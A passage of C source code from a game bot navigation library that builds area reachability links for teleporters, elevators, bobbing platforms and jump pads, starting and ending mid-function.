if (!AAS_ValueForBSPEpairKey(ent, "target", target, MAX_EPAIRKEY))
{
botimport.Print(PRT_ERROR, "trigger_multiple at %1.0f %1.0f %1.0f without target\n",
origin[0], origin[1], origin[2]);
continue;
} //end if
//a trigger_multiple teleports through an intermediate target_teleporter entity
for (dest = AAS_NextBSPEntity(0); dest; dest = AAS_NextBSPEntity(dest))
{
if (!AAS_ValueForBSPEpairKey(dest, "classname", classname, MAX_EPAIRKEY)) continue;
if (!strcmp(classname, "target_teleporter"))
{
if (!AAS_ValueForBSPEpairKey(dest, "targetname", targetname, MAX_EPAIRKEY)) continue;
if (!strcmp(targetname, target))
{
break;
} //end if
} //end if
} //end for
if (!dest)
{
continue;
} //end if
//the target_teleporter's own target points at the final destination entity
if (!AAS_ValueForBSPEpairKey(dest, "target", target, MAX_EPAIRKEY))
{
botimport.Print(PRT_ERROR, "target_teleporter without target\n");
continue;
} //end if
} //end if
else if (!strcmp(classname, "trigger_teleport"))
{
AAS_ValueForBSPEpairKey(ent, "model", model, MAX_EPAIRKEY);
//#ifdef REACH_DEBUG
botimport.Print(PRT_MESSAGE, "trigger_teleport model = \"%s\"\n", model);
//#endif REACH_DEBUG
VectorClear(angles);
AAS_BSPModelMinsMaxsOrigin(atoi(model+1), angles, mins, maxs, origin);
//
if (!AAS_ValueForBSPEpairKey(ent, "target", target, MAX_EPAIRKEY))
{
botimport.Print(PRT_ERROR, "trigger_teleport at %1.0f %1.0f %1.0f without target\n",
origin[0], origin[1], origin[2]);
continue;
} //end if
} //end if
else
{
continue;
} //end else
//find the destination entity with the wanted targetname
for (dest = AAS_NextBSPEntity(0); dest; dest = AAS_NextBSPEntity(dest))
{
//classname should be misc_teleporter_dest
//but I've also seen target_position and actually any
//entity could be used... burp
if (AAS_ValueForBSPEpairKey(dest, "targetname", targetname, MAX_EPAIRKEY))
{
if (!strcmp(targetname, target))
{
break;
} //end if
} //end if
} //end for
if (!dest)
{
botimport.Print(PRT_ERROR, "teleporter without misc_teleporter_dest (%s)\n", target);
continue;
} //end if
if (!AAS_VectorForBSPEpairKey(dest, "origin", destorigin))
{
botimport.Print(PRT_ERROR, "teleporter destination (%s) without origin\n", target);
continue;
} //end if
//
area2num = AAS_PointAreaNum(destorigin);
//if not teleported into a teleporter or into a jumppad
if (!AAS_AreaTeleporter(area2num) && !AAS_AreaJumpPad(area2num))
{
//make sure the destination point isn't buried in solid
VectorCopy(destorigin, end);
end[2] -= 64;
trace = AAS_TraceClientBBox(destorigin, end, PRESENCE_CROUCH, -1);
if (trace.startsolid)
{
botimport.Print(PRT_ERROR, "teleporter destination (%s) in solid\n", target);
continue;
} //end if
/*
area2num = AAS_PointAreaNum(trace.endpos);
//
if (!AAS_AreaTeleporter(area2num) &&
!AAS_AreaJumpPad(area2num) &&
!AAS_AreaGrounded(area2num))
{
VectorCopy(trace.endpos, destorigin);
}
else*/
{
//predict where you'll end up
AAS_FloatForBSPEpairKey(dest, "angle", &angle);
if (angle)
{
//NOTE(review): 400 presumably matches the game's teleporter exit
//push speed - confirm against the game code
VectorSet(angles, 0, angle, 0);
AngleVectors(angles, velocity, NULL, NULL);
VectorScale(velocity, 400, velocity);
} //end if
else
{
VectorClear(velocity);
} //end else
VectorClear(cmdmove);
AAS_PredictClientMovement(&move, -1, destorigin, PRESENCE_NORMAL, qfalse,
velocity, cmdmove, 0, 30, 0.1f,
SE_HITGROUND|SE_ENTERWATER|SE_ENTERSLIME|
SE_ENTERLAVA|SE_HITGROUNDDAMAGE|SE_TOUCHJUMPPAD|SE_TOUCHTELEPORTER, 0, qfalse); //qtrue);
area2num = AAS_PointAreaNum(move.endpos);
if (move.stopevent & (SE_ENTERSLIME|SE_ENTERLAVA))
{
botimport.Print(PRT_WARNING, "teleported into slime or lava at dest %s\n", target);
} //end if
VectorCopy(move.endpos, destorigin);
} //end else
} //end if
//
//botimport.Print(PRT_MESSAGE, "teleporter brush origin at %f %f %f\n", origin[0], origin[1], origin[2]);
//botimport.Print(PRT_MESSAGE, "teleporter brush mins = %f %f %f\n", mins[0], mins[1], mins[2]);
//botimport.Print(PRT_MESSAGE, "teleporter brush maxs = %f %f %f\n", maxs[0], maxs[1], maxs[2]);
//get the absolute bounds and the center of the trigger brush
VectorAdd(origin, mins, mins);
VectorAdd(origin, maxs, maxs);
//
VectorAdd(mins, maxs, mid);
VectorScale(mid, 0.5, mid);
//link an invalid (-1) entity
areas = AAS_LinkEntityClientBBox(mins, maxs, -1, PRESENCE_CROUCH);
if (!areas) botimport.Print(PRT_MESSAGE, "trigger_multiple not in any area\n");
//create a teleport reachability from every teleporter area the trigger touches
for (link = areas; link; link = link->next_area)
{
//if (!AAS_AreaGrounded(link->areanum)) continue;
if (!AAS_AreaTeleporter(link->areanum)) continue;
//
area1num = link->areanum;
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) break;
lreach->areanum = area2num;
lreach->facenum = 0;
lreach->edgenum = 0;
VectorCopy(mid, lreach->start);
VectorCopy(destorigin, lreach->end);
lreach->traveltype = TRAVEL_TELEPORT;
lreach->traveltype |= AAS_TravelFlagsForTeam(ent);
lreach->traveltime = aassettings.rs_teleport;
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//
reach_teleport++;
} //end for
//unlink the invalid entity
AAS_UnlinkFromAreas(areas);
} //end for
} //end of the function AAS_Reachability_Teleport
//===========================================================================
// create possible elevator (func_plat) reachabilities
// this is very game dependent.... :(
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
void AAS_Reachability_Elevator(void)
{
int area1num, area2num, modelnum, i, j, k, l, n, p;
float lip, height, speed;
char model[MAX_EPAIRKEY], classname[MAX_EPAIRKEY];
int ent;
vec3_t mins, maxs, origin, angles = {0, 0, 0};
vec3_t pos1, pos2, mids, platbottom, plattop;
vec3_t bottomorg, toporg, start, end, dir;
float xvals[8], yvals[8], xvals_top[8], yvals_top[8];
aas_lreachability_t *lreach;
aas_trace_t trace;
#ifdef REACH_DEBUG
Log_Write("AAS_Reachability_Elevator\r\n");
#endif //REACH_DEBUG
//check all the BSP entities for func_plat elevators
for (ent = AAS_NextBSPEntity(0); ent; ent = AAS_NextBSPEntity(ent))
{
if (!AAS_ValueForBSPEpairKey(ent, "classname", classname, MAX_EPAIRKEY)) continue;
if (!strcmp(classname, "func_plat"))
{
#ifdef REACH_DEBUG
Log_Write("found func plat\r\n");
#endif //REACH_DEBUG
if (!AAS_ValueForBSPEpairKey(ent, "model", model, MAX_EPAIRKEY))
{
botimport.Print(PRT_ERROR, "func_plat without model\n");
continue;
} //end if
//get the model number, and skip the leading *
modelnum = atoi(model+1);
if (modelnum <= 0)
{
botimport.Print(PRT_ERROR, "func_plat with invalid model number\n");
continue;
} //end if
//get the mins, maxs and origin of the model
//NOTE: the origin is usually (0,0,0) and the mins and maxs
// are the absolute mins and maxs
AAS_BSPModelMinsMaxsOrigin(modelnum, angles, mins, maxs, origin);
//
AAS_VectorForBSPEpairKey(ent, "origin", origin);
//pos1 is the top position, pos2 is the bottom
VectorCopy(origin, pos1);
VectorCopy(origin, pos2);
//get the lip of the plat
AAS_FloatForBSPEpairKey(ent, "lip", &lip);
if (!lip) lip = 8;
//get the movement height of the plat
AAS_FloatForBSPEpairKey(ent, "height", &height);
if (!height) height = (maxs[2] - mins[2]) - lip;
//get the speed of the plat
AAS_FloatForBSPEpairKey(ent, "speed", &speed);
if (!speed) speed = 200;
//get bottom position below pos1
pos2[2] -= height;
//
//get a point just above the plat in the bottom position
VectorAdd(mins, maxs, mids);
VectorMA(pos2, 0.5, mids, platbottom);
platbottom[2] = maxs[2] - (pos1[2] - pos2[2]) + 2;
//get a point just above the plat in the top position
VectorAdd(mins, maxs, mids);
VectorMA(pos2, 0.5, mids, plattop);
plattop[2] = maxs[2] + 2;
//
/*if (!area1num)
{
Log_Write("no grounded area near plat bottom\r\n");
continue;
} //end if*/
//get the mins and maxs a little larger
for (i = 0; i < 3; i++)
{
mins[i] -= 1;
maxs[i] += 1;
} //end for
//
//botimport.Print(PRT_MESSAGE, "platbottom[2] = %1.1f plattop[2] = %1.1f\n", platbottom[2], plattop[2]);
//
VectorAdd(mins, maxs, mids);
VectorScale(mids, 0.5, mids);
//sample points: 0-3 are the bbox edge midpoints, 4-7 are the corners
xvals[0] = mins[0]; xvals[1] = mids[0]; xvals[2] = maxs[0]; xvals[3] = mids[0];
yvals[0] = mids[1]; yvals[1] = maxs[1]; yvals[2] = mids[1]; yvals[3] = mins[1];
//
xvals[4] = mins[0]; xvals[5] = maxs[0]; xvals[6] = maxs[0]; xvals[7] = mins[0];
yvals[4] = maxs[1]; yvals[5] = maxs[1]; yvals[6] = mins[1]; yvals[7] = mins[1];
//find adjacent areas around the bottom of the plat
for (i = 0; i < 9; i++)
{
if (i < 8) //check at the sides of the plat
{
bottomorg[0] = origin[0] + xvals[i];
bottomorg[1] = origin[1] + yvals[i];
bottomorg[2] = platbottom[2] + 16;
//get a grounded or swim area near the plat in the bottom position
area1num = AAS_PointAreaNum(bottomorg);
//probe upwards in 4 unit steps until a usable area is found
for (k = 0; k < 16; k++)
{
if (area1num)
{
if (AAS_AreaGrounded(area1num) || AAS_AreaSwim(area1num)) break;
} //end if
bottomorg[2] += 4;
area1num = AAS_PointAreaNum(bottomorg);
} //end if
//if in solid
if (k >= 16)
{
continue;
} //end if
} //end if
else //at the middle of the plat
{
VectorCopy(plattop, bottomorg);
bottomorg[2] += 24;
area1num = AAS_PointAreaNum(bottomorg);
if (!area1num) continue;
VectorCopy(platbottom, bottomorg);
bottomorg[2] += 24;
} //end else
//look at adjacent areas around the top of the plat
//make larger steps to outside the plat everytime
for (n = 0; n < 3; n++)
{
//grow the box by 4 units on every axis each pass
for (k = 0; k < 3; k++)
{
mins[k] -= 4;
maxs[k] += 4;
} //end for
xvals_top[0] = mins[0]; xvals_top[1] = mids[0]; xvals_top[2] = maxs[0]; xvals_top[3] = mids[0];
yvals_top[0] = mids[1]; yvals_top[1] = maxs[1]; yvals_top[2] = mids[1]; yvals_top[3] = mins[1];
//
xvals_top[4] = mins[0]; xvals_top[5] = maxs[0]; xvals_top[6] = maxs[0]; xvals_top[7] = mins[0];
yvals_top[4] = maxs[1]; yvals_top[5] = maxs[1]; yvals_top[6] = mins[1]; yvals_top[7] = mins[1];
//
for (j = 0; j < 8; j++)
{
toporg[0] = origin[0] + xvals_top[j];
toporg[1] = origin[1] + yvals_top[j];
toporg[2] = plattop[2] + 16;
//get a grounded or swim area near the plat in the top position
area2num = AAS_PointAreaNum(toporg);
for (l = 0; l < 16; l++)
{
if (area2num)
{
if (AAS_AreaGrounded(area2num) || AAS_AreaSwim(area2num))
{
//the area must be traceable from just above the plat top
VectorCopy(plattop, start);
start[2] += 32;
VectorCopy(toporg, end);
end[2] += 1;
trace = AAS_TraceClientBBox(start, end, PRESENCE_CROUCH, -1);
if (trace.fraction >= 1) break;
} //end if
} //end if
toporg[2] += 4;
area2num = AAS_PointAreaNum(toporg);
} //end if
//if in solid
if (l >= 16) continue;
//never create a reachability in the same area
if (area2num == area1num) continue;
//if the area isn't grounded
if (!AAS_AreaGrounded(area2num)) continue;
//if there already exists reachability between the areas
if (AAS_ReachabilityExists(area1num, area2num)) continue;
//if the reachability start is within the elevator bounding box
//NOTE: dir is reused as the reachability start point here
VectorSubtract(bottomorg, platbottom, dir);
VectorNormalize(dir);
dir[0] = bottomorg[0] + 24 * dir[0];
dir[1] = bottomorg[1] + 24 * dir[1];
dir[2] = bottomorg[2];
//
for (p = 0; p < 3; p++)
if (dir[p] < origin[p] + mins[p] || dir[p] > origin[p] + maxs[p]) break;
if (p >= 3) continue;
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) continue;
lreach->areanum = area2num;
//the facenum is the model number
lreach->facenum = modelnum;
//the edgenum is the height
lreach->edgenum = (int) height;
//
VectorCopy(dir, lreach->start);
VectorCopy(toporg, lreach->end);
lreach->traveltype = TRAVEL_ELEVATOR;
lreach->traveltype |= AAS_TravelFlagsForTeam(ent);
lreach->traveltime = aassettings.rs_startelevator + height * 100 / speed;
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//don't go any further to the outside
n = 9999;
//
#ifdef REACH_DEBUG
Log_Write("elevator reach from %d to %d\r\n", area1num, area2num);
#endif //REACH_DEBUG
//
reach_elevator++;
} //end for
} //end for
} //end for
} //end if
} //end for
} //end of the function AAS_Reachability_Elevator
//===========================================================================
// returns a list of temporary reachability links between ground faces of
// nearby areas and the given face polygon; when towardsface is qtrue the
// links go from the areas towards the face, otherwise away from it;
// the caller fills in travel type/time and frees the returned links
//
// Parameter: facepoints  : vertices of the face polygon
//            numpoints   : number of vertices
//            plane       : plane of the face polygon
//            towardsface : qtrue when the links go towards the face
// Returns: linked list of reachability links, NULL when none are found
// Changes Globals: -
//===========================================================================
aas_lreachability_t *AAS_FindFaceReachabilities(vec3_t *facepoints, int numpoints, aas_plane_t *plane, int towardsface)
{
int i, j, k, l;
int facenum, edgenum, bestfacenum;
float *v1, *v2, *v3, *v4;
float bestdist, speed, hordist, dist;
vec3_t beststart, beststart2, bestend, bestend2, tmp, hordir, testpoint;
aas_lreachability_t *lreach, *lreachabilities;
aas_area_t *area;
aas_face_t *face;
aas_edge_t *edge;
aas_plane_t *faceplane, *bestfaceplane;
//
lreachabilities = NULL;
bestfacenum = 0;
bestfaceplane = NULL;
//check every area for ground faces close to the given face polygon
for (i = 1; i < aasworld.numareas; i++)
{
area = &aasworld.areas[i];
// get the shortest distance between one of the func_bob start edges and
// one of the face edges of area1
bestdist = 999999;
for (j = 0; j < area->numfaces; j++)
{
facenum = aasworld.faceindex[area->firstface + j];
face = &aasworld.faces[abs(facenum)];
//if not a ground face
if (!(face->faceflags & FACE_GROUND)) continue;
//get the ground planes
faceplane = &aasworld.planes[face->planenum];
//
for (k = 0; k < face->numedges; k++)
{
edgenum = abs(aasworld.edgeindex[face->firstedge + k]);
edge = &aasworld.edges[edgenum];
//calculate the minimum distance between the two edges
v1 = aasworld.vertexes[edge->v[0]];
v2 = aasworld.vertexes[edge->v[1]];
//
for (l = 0; l < numpoints; l++)
{
v3 = facepoints[l];
v4 = facepoints[(l+1) % numpoints];
//NOTE: fills beststart/bestend pairs with the closest edge points
dist = AAS_ClosestEdgePoints(v1, v2, v3, v4, faceplane, plane,
beststart, bestend,
beststart2, bestend2, bestdist);
if (dist < bestdist)
{
bestfacenum = facenum;
bestfaceplane = faceplane;
bestdist = dist;
} //end if
} //end for
} //end for
} //end for
//the closest edges must be within range
if (bestdist > 192) continue;
//use the midpoints of the closest edge point pairs
VectorMiddle(beststart, beststart2, beststart);
VectorMiddle(bestend, bestend2, bestend);
//swap start and end when the links go away from the face
if (!towardsface)
{
VectorCopy(beststart, tmp);
VectorCopy(bestend, beststart);
VectorCopy(tmp, bestend);
} //end if
//
VectorSubtract(bestend, beststart, hordir);
hordir[2] = 0;
hordist = VectorLength(hordir);
//
if (hordist > 2 * AAS_MaxJumpDistance(aassettings.phys_jumpvel)) continue;
//the end point should not be significantly higher than the start point
if (bestend[2] - 32 > beststart[2]) continue;
//don't fall down too far
if (bestend[2] < beststart[2] - 128) continue;
//the distance should not be too far
if (hordist > 32)
{
//check for walk off ledge
if (!AAS_HorizontalVelocityForJump(0, beststart, bestend, &speed)) continue;
} //end if
//
beststart[2] += 1;
bestend[2] += 1;
//project the test point onto the plane of the best ground face
if (towardsface) VectorCopy(bestend, testpoint);
else VectorCopy(beststart, testpoint);
testpoint[2] = 0;
testpoint[2] = (bestfaceplane->dist - DotProduct(bestfaceplane->normal, testpoint)) / bestfaceplane->normal[2];
//
if (!AAS_PointInsideFace(bestfacenum, testpoint, 0.1f))
{
//if the faces are not overlapping then only go down
if (bestend[2] - 16 > beststart[2]) continue;
} //end if
//create a temporary link; travel type and time are set by the caller
lreach = AAS_AllocReachability();
if (!lreach) return lreachabilities;
lreach->areanum = i;
lreach->facenum = 0;
lreach->edgenum = 0;
VectorCopy(beststart, lreach->start);
VectorCopy(bestend, lreach->end);
lreach->traveltype = 0;
lreach->traveltime = 0;
lreach->next = lreachabilities;
lreachabilities = lreach;
#ifndef BSPC
if (towardsface) AAS_PermanentLine(lreach->start, lreach->end, 1);
else AAS_PermanentLine(lreach->start, lreach->end, 2);
#endif
} //end for
return lreachabilities;
} //end of the function AAS_FindFaceReachabilities
//===========================================================================
// create reachabilities for func_bobbing entities: finds areas reachable
// from the top of the model bounding box at both extremes of the bobbing
// movement and links them with TRAVEL_FUNCBOB reachabilities
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
void AAS_Reachability_FuncBobbing(void)
{
	int ent, spawnflags, modelnum, axis;
	int i, numareas, areas[10];
	char classname[MAX_EPAIRKEY], model[MAX_EPAIRKEY];
	vec3_t origin, move_end, move_start, move_start_top, move_end_top;
	vec3_t mins, maxs, angles = {0, 0, 0};
	vec3_t start_edgeverts[4], end_edgeverts[4], mid;
	vec3_t org, start, end, dir, points[10];
	float height;
	aas_plane_t start_plane, end_plane;
	aas_lreachability_t *startreach, *endreach, *nextstartreach, *nextendreach, *lreach;
	aas_lreachability_t *firststartreach, *firstendreach;

	for (ent = AAS_NextBSPEntity(0); ent; ent = AAS_NextBSPEntity(ent))
	{
		if (!AAS_ValueForBSPEpairKey(ent, "classname", classname, MAX_EPAIRKEY)) continue;
		if (strcmp(classname, "func_bobbing")) continue;
		//the "height" key is the bobbing amplitude, default 32
		AAS_FloatForBSPEpairKey(ent, "height", &height);
		if (!height) height = 32;
		//
		if (!AAS_ValueForBSPEpairKey(ent, "model", model, MAX_EPAIRKEY))
		{
			botimport.Print(PRT_ERROR, "func_bobbing without model\n");
			continue;
		} //end if
		//get the model number, and skip the leading *
		modelnum = atoi(model+1);
		if (modelnum <= 0)
		{
			botimport.Print(PRT_ERROR, "func_bobbing with invalid model number\n");
			continue;
		} //end if
		//if the entity has an origin set then use it
		if (!AAS_VectorForBSPEpairKey(ent, "origin", origin))
			VectorSet(origin, 0, 0, 0);
		//
		AAS_BSPModelMinsMaxsOrigin(modelnum, angles, mins, maxs, NULL);
		//get absolute bounds and use the bbox center as the origin
		VectorAdd(mins, origin, mins);
		VectorAdd(maxs, origin, maxs);
		//
		VectorAdd(mins, maxs, mid);
		VectorScale(mid, 0.5, mid);
		VectorCopy(mid, origin);
		//
		VectorCopy(origin, move_end);
		VectorCopy(origin, move_start);
		//
		AAS_IntForBSPEpairKey(ent, "spawnflags", &spawnflags);
		//set the axis of bobbing: spawnflag 1 = X axis, 2 = Y axis, default Z
		if (spawnflags & 1) axis = 0;
		else if (spawnflags & 2) axis = 1;
		else axis = 2;
		//the origin is the center of the movement
		move_start[axis] -= height;
		move_end[axis] += height;
		//
		Log_Write("funcbob model %d, start = {%1.1f, %1.1f, %1.1f} end = {%1.1f, %1.1f, %1.1f}\n",
					modelnum, move_start[0], move_start[1], move_start[2], move_end[0], move_end[1], move_end[2]);
		//
#ifndef BSPC
		/*
		AAS_DrawPermanentCross(move_start, 4, 1);
		AAS_DrawPermanentCross(move_end, 4, 2);
		*/
#endif
		//vertices of the bbox top face with the model in the start position
		for (i = 0; i < 4; i++)
		{
			VectorCopy(move_start, start_edgeverts[i]);
			start_edgeverts[i][2] += maxs[2] - mid[2]; //+ bbox maxs z
			start_edgeverts[i][2] += 24; //+ player origin to ground dist
		} //end for
		start_edgeverts[0][0] += maxs[0] - mid[0];
		start_edgeverts[0][1] += maxs[1] - mid[1];
		start_edgeverts[1][0] += maxs[0] - mid[0];
		start_edgeverts[1][1] += mins[1] - mid[1];
		start_edgeverts[2][0] += mins[0] - mid[0];
		start_edgeverts[2][1] += mins[1] - mid[1];
		start_edgeverts[3][0] += mins[0] - mid[0];
		start_edgeverts[3][1] += maxs[1] - mid[1];
		//horizontal plane at the height of the start top face
		start_plane.dist = start_edgeverts[0][2];
		VectorSet(start_plane.normal, 0, 0, 1);
		//vertices of the bbox top face with the model in the end position
		for (i = 0; i < 4; i++)
		{
			VectorCopy(move_end, end_edgeverts[i]);
			end_edgeverts[i][2] += maxs[2] - mid[2]; //+ bbox maxs z
			end_edgeverts[i][2] += 24; //+ player origin to ground dist
		} //end for
		end_edgeverts[0][0] += maxs[0] - mid[0];
		end_edgeverts[0][1] += maxs[1] - mid[1];
		end_edgeverts[1][0] += maxs[0] - mid[0];
		end_edgeverts[1][1] += mins[1] - mid[1];
		end_edgeverts[2][0] += mins[0] - mid[0];
		end_edgeverts[2][1] += mins[1] - mid[1];
		end_edgeverts[3][0] += mins[0] - mid[0];
		end_edgeverts[3][1] += maxs[1] - mid[1];
		//horizontal plane at the height of the end top face
		end_plane.dist = end_edgeverts[0][2];
		VectorSet(end_plane.normal, 0, 0, 1);
		//
#ifndef BSPC
#if 0
		for (i = 0; i < 4; i++)
		{
			AAS_PermanentLine(start_edgeverts[i], start_edgeverts[(i+1)%4], 1);
			AAS_PermanentLine(end_edgeverts[i], end_edgeverts[(i+1)%4], 1);
		} //end for
#endif
#endif
		//points where a client would stand on top of the model
		VectorCopy(move_start, move_start_top);
		move_start_top[2] += maxs[2] - mid[2] + 24; //+ bbox maxs z
		VectorCopy(move_end, move_end_top);
		move_end_top[2] += maxs[2] - mid[2] + 24; //+ bbox maxs z
		//both top points must be inside some area
		if (!AAS_PointAreaNum(move_start_top)) continue;
		if (!AAS_PointAreaNum(move_end_top)) continue;
		//check both movement directions: start->end and end->start
		for (i = 0; i < 2; i++)
		{
			if (i == 0)
			{
				firststartreach = AAS_FindFaceReachabilities(start_edgeverts, 4, &start_plane, qtrue);
				firstendreach = AAS_FindFaceReachabilities(end_edgeverts, 4, &end_plane, qfalse);
			} //end if
			else
			{
				firststartreach = AAS_FindFaceReachabilities(end_edgeverts, 4, &end_plane, qtrue);
				firstendreach = AAS_FindFaceReachabilities(start_edgeverts, 4, &start_plane, qfalse);
			} //end else
			//create reachabilities from every boarding area to every exit area
			for (startreach = firststartreach; startreach; startreach = nextstartreach)
			{
				nextstartreach = startreach->next;
				//
				for (endreach = firstendreach; endreach; endreach = nextendreach)
				{
					nextendreach = endreach->next;
					//
					Log_Write("funcbob reach from area %d to %d\n", startreach->areanum, endreach->areanum);
					//
					if (i == 0) VectorCopy(move_start_top, org);
					else VectorCopy(move_end_top, org);
					//nudge the reachability start horizontally away from the model
					VectorSubtract(startreach->start, org, dir);
					dir[2] = 0;
					VectorNormalize(dir);
					VectorMA(startreach->start, 1, dir, start);
					start[2] += 1;
					VectorMA(startreach->start, 16, dir, end);
					end[2] += 1;
					//
					numareas = AAS_TraceAreas(start, end, areas, points, 10);
					if (numareas <= 0) continue;
					if (numareas > 1) VectorCopy(points[1], startreach->start);
					else VectorCopy(end, startreach->start);
					//both end points must be inside an area
					if (!AAS_PointAreaNum(startreach->start)) continue;
					if (!AAS_PointAreaNum(endreach->end)) continue;
					//create a new reachability link
					lreach = AAS_AllocReachability();
					//out of reachability links (was dereferenced unchecked before)
					if (!lreach) break;
					lreach->areanum = endreach->areanum;
					//NOTE: the edgenum packs the start and end positions along the bobbing axis
					if (i == 0) lreach->edgenum = ((int)move_start[axis] << 16) | ((int) move_end[axis] & 0x0000ffff);
					else lreach->edgenum = ((int)move_end[axis] << 16) | ((int) move_start[axis] & 0x0000ffff);
					//NOTE: the facenum packs the spawnflags and the model number
					lreach->facenum = (spawnflags << 16) | modelnum;
					VectorCopy(startreach->start, lreach->start);
					VectorCopy(endreach->end, lreach->end);
#ifndef BSPC
//					AAS_DrawArrow(lreach->start, lreach->end, LINECOLOR_BLUE, LINECOLOR_YELLOW);
//					AAS_PermanentLine(lreach->start, lreach->end, 1);
#endif
					lreach->traveltype = TRAVEL_FUNCBOB;
					lreach->traveltype |= AAS_TravelFlagsForTeam(ent);
					lreach->traveltime = aassettings.rs_funcbob;
					reach_funcbob++;
					lreach->next = areareachability[startreach->areanum];
					areareachability[startreach->areanum] = lreach;
				} //end for
			} //end for
			//free the temporary links returned by AAS_FindFaceReachabilities
			for (startreach = firststartreach; startreach; startreach = nextstartreach)
			{
				nextstartreach = startreach->next;
				AAS_FreeReachability(startreach);
			} //end for
			for (endreach = firstendreach; endreach; endreach = nextendreach)
			{
				nextendreach = endreach->next;
				AAS_FreeReachability(endreach);
			} //end for
			//only go up with func_bobbing entities that go up and down
			if (!(spawnflags & 1) && !(spawnflags & 2)) break;
		} //end for
	} //end for
} //end of the function AAS_Reachability_FuncBobbing
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
void AAS_Reachability_JumpPad(void)
{
int face2num, i, ret, area2num, visualize, ent, bot_visualizejumppads;
//int modelnum, ent2;
//float dist, time, height, gravity, forward;
float speed, zvel;
//float hordist;
aas_face_t *face2;
aas_area_t *area2;
aas_lreachability_t *lreach;
vec3_t areastart, facecenter, dir, cmdmove;
vec3_t velocity, absmins, absmaxs;
//vec3_t origin, ent2origin, angles, teststart;
aas_clientmove_t move;
//aas_trace_t trace;
aas_link_t *areas, *link;
//char target[MAX_EPAIRKEY], targetname[MAX_EPAIRKEY], model[MAX_EPAIRKEY];
char classname[MAX_EPAIRKEY];
#ifdef BSPC
bot_visualizejumppads = 0;
#else
bot_visualizejumppads = LibVarValue("bot_visualizejumppads", "0");
#endif
for (ent = AAS_NextBSPEntity(0); ent; ent = AAS_NextBSPEntity(ent))
{
if (!AAS_ValueForBSPEpairKey(ent, "classname", classname, MAX_EPAIRKEY)) continue;
if (strcmp(classname, "trigger_push")) continue;
//
if (!AAS_GetJumpPadInfo(ent, areastart, absmins, absmaxs, velocity)) continue;
/*
//
AAS_FloatForBSPEpairKey(ent, "speed", &speed);
if (!speed) speed = 1000;
// AAS_VectorForBSPEpairKey(ent, "angles", angles);
// AAS_SetMovedir(angles, velocity);
// VectorScale(velocity, speed, velocity);
VectorClear(angles);
//get the mins, maxs and origin of the model
AAS_ValueForBSPEpairKey(ent, "model", model, MAX_EPAIRKEY);
if (model[0]) modelnum = atoi(model+1);
else modelnum = 0;
AAS_BSPModelMinsMaxsOrigin(modelnum, angles, absmins, absmaxs, origin);
VectorAdd(origin, absmins, absmins);
VectorAdd(origin, absmaxs, absmaxs);
//
#ifdef REACH_DEBUG
botimport.Print(PRT_MESSAGE, "absmins = %f %f %f\n", absmins[0], absmins[1], absmins[2]);
botimport.Print(PRT_MESSAGE, "absmaxs = %f %f %f\n", absmaxs[0], absmaxs[1], absmaxs[2]);
#endif REACH_DEBUG
VectorAdd(absmins, absmaxs, origin);
VectorScale (origin, 0.5, origin);
//get the start areas
VectorCopy(origin, teststart);
teststart[2] += 64;
trace = AAS_TraceClientBBox(teststart, origin, PRESENCE_CROUCH, -1);
if (trace.startsolid)
{
botimport.Print(PRT_MESSAGE, "trigger_push start solid\n");
VectorCopy(origin, areastart);
} //end if
else
{
VectorCopy(trace.endpos, areastart);
} //end else
areastart[2] += 0.125;
//
//AAS_DrawPermanentCross(origin, 4, 4);
//get the target entity
AAS_ValueForBSPEpairKey(ent, "target", target, MAX_EPAIRKEY);
for (ent2 = AAS_NextBSPEntity(0); ent2; ent2 = AAS_NextBSPEntity(ent2))
{
if (!AAS_ValueForBSPEpairKey(ent2, "targetname", targetname, MAX_EPAIRKEY)) continue;
if (!strcmp(targetname, target)) break;
} //end for
if (!ent2)
{
botimport.Print(PRT_MESSAGE, "trigger_push without target entity %s\n", target);
continue;
} //end if
AAS_VectorForBSPEpairKey(ent2, "origin", ent2origin);
//
height = ent2origin[2] - origin[2];
gravity = aassettings.sv_gravity;
time = sqrt( height / ( 0.5 * gravity ) );
if (!time)
{
botimport.Print(PRT_MESSAGE, "trigger_push without time\n");
continue;
} //end if
// set s.origin2 to the push velocity
VectorSubtract ( ent2origin, origin, velocity);
dist = VectorNormalize( velocity);
forward = dist / time;
//FIXME: why multiply by 1.1
forward *= 1.1;
VectorScale(velocity, forward, velocity);
velocity[2] = time * gravity;
*/
//get the areas the jump pad brush is in
areas = AAS_LinkEntityClientBBox(absmins, absmaxs, -1, PRESENCE_CROUCH);
/*
for (link = areas; link; link = link->next_area)
{
if (link->areanum == 563)
{
ret = qfalse;
}
}
*/
for (link = areas; link; link = link->next_area)
{
if (AAS_AreaJumpPad(link->areanum)) break;
} //end for
if (!link)
{
botimport.Print(PRT_MESSAGE, "trigger_push not in any jump pad area\n");
AAS_UnlinkFromAreas(areas);
continue;
} //end if
//
botimport.Print(PRT_MESSAGE, "found a trigger_push with velocity %f %f %f\n", velocity[0], velocity[1], velocity[2]);
//if there is a horizontal velocity check for a reachability without air control
if (velocity[0] || velocity[1])
{
VectorSet(cmdmove, 0, 0, 0);
//VectorCopy(velocity, cmdmove);
//cmdmove[2] = 0;
Com_Memset(&move, 0, sizeof(aas_clientmove_t));
area2num = 0;
for (i = 0; i < 20; i++)
{
AAS_PredictClientMovement(&move, -1, areastart, PRESENCE_NORMAL, qfalse,
velocity, cmdmove, 0, 30, 0.1f,
SE_HITGROUND|SE_ENTERWATER|SE_ENTERSLIME|
SE_ENTERLAVA|SE_HITGROUNDDAMAGE|SE_TOUCHJUMPPAD|SE_TOUCHTELEPORTER, 0, bot_visualizejumppads);
area2num = move.endarea;
for (link = areas; link; link = link->next_area)
{
if (!AAS_AreaJumpPad(link->areanum)) continue;
if (link->areanum == area2num) break;
} //end if
if (!link) break;
VectorCopy(move.endpos, areastart);
VectorCopy(move.velocity, velocity);
} //end for
if (area2num && i < 20)
{
for (link = areas; link; link = link->next_area)
{
if (!AAS_AreaJumpPad(link->areanum)) continue;
if (AAS_ReachabilityExists(link->areanum, area2num)) continue;
//create a rocket or bfg jump reachability from area1 to area2
lreach = AAS_AllocReachability();
if (!lreach)
{
AAS_UnlinkFromAreas(areas);
return;
} //end if
